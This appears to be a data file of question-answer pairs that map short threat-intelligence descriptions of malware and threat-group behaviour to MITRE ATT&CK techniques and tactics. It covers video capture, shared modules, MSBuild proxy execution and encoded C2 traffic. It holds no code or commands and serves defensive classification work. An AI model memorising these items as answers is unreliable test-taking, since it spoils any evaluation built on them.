+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda collects the current system time (UTC) and sends it back to the C2 server.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 can determine the local time on targeted machines.,"Tecnique: T1124 System Time Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 created a custom video recording capability that could be used to monitor operations in the victim's environment.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has been observed making videos of victims to observe bank employees day to day activities.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can access the victim’s webcam and record video.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can record screen content on targeted systems.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has modules that are capable of capturing video from a victim's webcam.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can record screen content in AVI format.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobian RAT has a feature to access the webcam on the victim’s machine.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ConnectWise can record video on remote hosts.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can capture webcam video on targeted systems.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can access the victim’s webcam to take pictures.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi is capable of capturing video.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can capture webcam data on Windows and macOS systems.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilGrab has the capability to capture video from a victim machine.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a remote webcam monitoring capability.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can remotely activate the victim’s webcam to capture content.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar captures images from the webcam.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete takes photos from the computer’s web camera.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore can access the victim's webcam and capture data.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can capture images from webcams on compromised hosts.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can capture camera video as part of its collection process.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used a Python tool named Bewmac to record the webcam on compromised hosts.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can access a connected webcam and capture pictures.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can perform webcam viewing.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos can access a system’s webcam and take pictures.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT has the ability to access the webcam.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to record video on a compromised host.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 uses the Skype API to record audio and video calls. It writes encrypted data to %APPDATA%\Intel\Skype.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to capture webcam video.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can access the webcam on a victim's machine.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a command to perform video device spying.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT has the capability to capture video from a webcam.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can access the victim's webcam.,"Tecnique: T1125 Video Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used MSbuild to execute an actor-created file.","Tecnique: T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use built-in modules to abuse trusted utilities like MSBuild.exe.,"Tecnique: T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A version of PlugX loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application control techniques.","Tecnique: T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth uses the LoadLibraryExW() function to load additional modules.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's dispatcher can execute additional plugins by loading the respective DLLs.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BOOSTWRITE has used the DWriteCreateFactory() function to load additional modules.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use `LoadLibrary` to attempt to execute GdiPlus.dll.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can load DLLs.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack contains a function that calls LoadLibrary and GetProcAddress.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb's loader can call the load() function to load the FoggyWeb dll into an Application Domain on a compromised AD FS server.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a backdoor through which remote attackers can load and call DLL functions.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk loads and executes functions from a DLL.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo had used AutoIt to load and execute the DLL payload.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For network communications, OSX_OCEANLOTUS.D loads a dynamic library (`.dylib` file) using `dlopen()` and obtains a function pointer to execute within that shared library using `dlsym()`.","Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY can load a DLL using the LoadLibrary API.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon has used call to LoadLibrary to load its installer. PipeMon loads its modules using reflective loading or custom shellcode.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro uses dynamically linked shared libraries (`.so` files) to execute additional functionality using `dlopen()` and `dlsym()`.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet calls LoadLibrary then executes exports from a DLL.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to inject the LoadLibrary call template DLL into running processes.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT can load DLLs into memory.,"Tecnique: T1129 Shared Modules, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64.","Tecnique: T1132 Data Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 obfuscates C2 traffic with an altered version of base64.,"Tecnique: T1132 Data Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linux Rabbit sends the payload from the C2 server as an encoded URL parameter.,"Tecnique: T1132 Data Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic provides various transform functions to encode and/or randomize C2 data.,"Tecnique: T1132 Data Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used encoded data in HTTP URLs for C2.,"Tecnique: T1132 Data Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT19 HTTP malware variant used Base64 to encode communications to the C2 server.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used base64 to encode command and control traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Several BRONZE BUTLER tools encode data with base64 when posting it to a C2 server.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used ASCII encoding for C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Lazarus Group malware sample encodes data with base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used tools to encode C2 communications including Base64 encoding.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork used Base64 to encode C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team's BCS-server tool uses base64 encoding and HTML tags for the communication traffic between the C2 server.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used encoded ASCII text for initial C2 communications.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used base64 encoding to hide command strings delivered from the C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding.","Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth encodes data using Base64 before sending it to the C2 server.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AutoIt backdoor has sent a C2 response that was base64-encoded.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS encodes C2 traffic with base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLINDINGCAN has encoded its C2 traffic with Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BS2005 uses Base64 encoding for communication in the message body of an HTTP request.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has encoded data using certutil before exfiltration.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Backdoor.Oldrea samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.","Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has encoded binary data with Base64 and ASCII.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has the ability to base64 encode C2 server responses.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL C2 messages are Base64-encoded.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak encodes the message body of HTTP traffic with Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes can encode C2 data with a custom technique that utilizes Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used Base64 to encode C2 communications.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can send additional modules over C2 encoded with base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use Base64, URL-safe Base64, or NetBIOS encoding in its C2 traffic.","Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobian RAT obfuscates communications with the C2 server using Base64 encoding.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepySnail can use Base64 to encode its C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman encodes data using hexadecimal representation before sending it to the C2 server.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf uses custom base64 encoding to obfuscate HTTP traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis encodes the data sent to the server in Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dipsind encodes C2 traffic with base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem can Base64 encode data sent to C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has encoded C2 traffic in hexadecimal format.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise exfiltrates data using cookie values that are Base64-encoded.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has used Google’s Protobufs to serialize data sent to and from the C2 server.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Felismus samples use a custom method for C2 traffic that utilizes Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has encoded bidirectional data communications between a target system and C2 server using Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis can use Base64 to encode its C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GLASSTOKEN has hexadecimal and Base64 encoded C2 content.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can base64 encode C2 replies.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has utilized Zlib compression to obfuscate the communications payload.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C2 over HTTP, Helminth encodes data with base64 and sends it via the ""Cookie"" field of HTTP requests. For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values and sends the data in cleartext.","Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A JHUHUGIT variant encodes C2 POST data base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has used a custom base64 key to encode stolen data before exfiltration.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar encodes communications to the C2 server in Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can Base32 encode chunks of output files during exfiltration.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has used base64 encoding.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can encode data using Base64 prior to exfiltration.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MechaFlounder has the ability to use base16 encoded strings in C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type uses Base64 encoding for C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat network traffic is Base64-encoded plaintext.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can use Base64 to encode information sent to its C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has used basE91 encoding, along with encryption, for C2 communication.","Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori can use Base64 encoded JSON libraries used in C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has used `zlib` to compress all data after 0x52 for the custom TCP C2 protocol.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has encoded C2 communications in Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum has used base64 to encode C2 communication.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE encodes data in hexadecimal format over the C2 channel.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS encoded C2 traffic with base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER can use base64 encoded C2 communications.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PULSECHECK can base-64 encode encrypted data sent through C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can encode C2 traffic with Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Responses from the Pisloader C2 server are base32-encoded.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has the ability to encode C2 communications with base64 encoding.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka encodes C2 traffic with Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT encodes C2 communications with base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY can base64 encode C2 communications.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can Base64 encode system information sent to C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can communicate with the C2 via base32-encoded subdomains.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has used base64 to encode its C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT uses Base64 to encode information sent to the C2 server.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin base64 encodes strings that are sent to the C2 over its DNS tunnel.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro uses ZLIB Compression to compresses data sent to the C2 server in the `payload` section network communication packet.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type uses Base64 encoding for C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLIGHTPULSE can base64 encode all incoming and outgoing C2 messages.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has encoded its C2 traffic with Base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE has the ability to hex-encode collected data from an infected host.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STEADYPULSE can transmit URL encoded data over C2.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST used Base64 encoding in its C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used Base64 to encode its C2 communications.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can base64 encode data sent in C2 communications prior to its encryption.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic can encode client ID data in 32 uppercase hex characters and transfer to the actor-controlled C2 server.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke C2 traffic is base64-encoded.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist has used Base64 for encoded C2 traffic.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark has encoded communications with the C2 server with base64.,"Tecnique: T1132.001 Data Encoding: Standard Encoding, Tactic: TA0011 Command and Control"
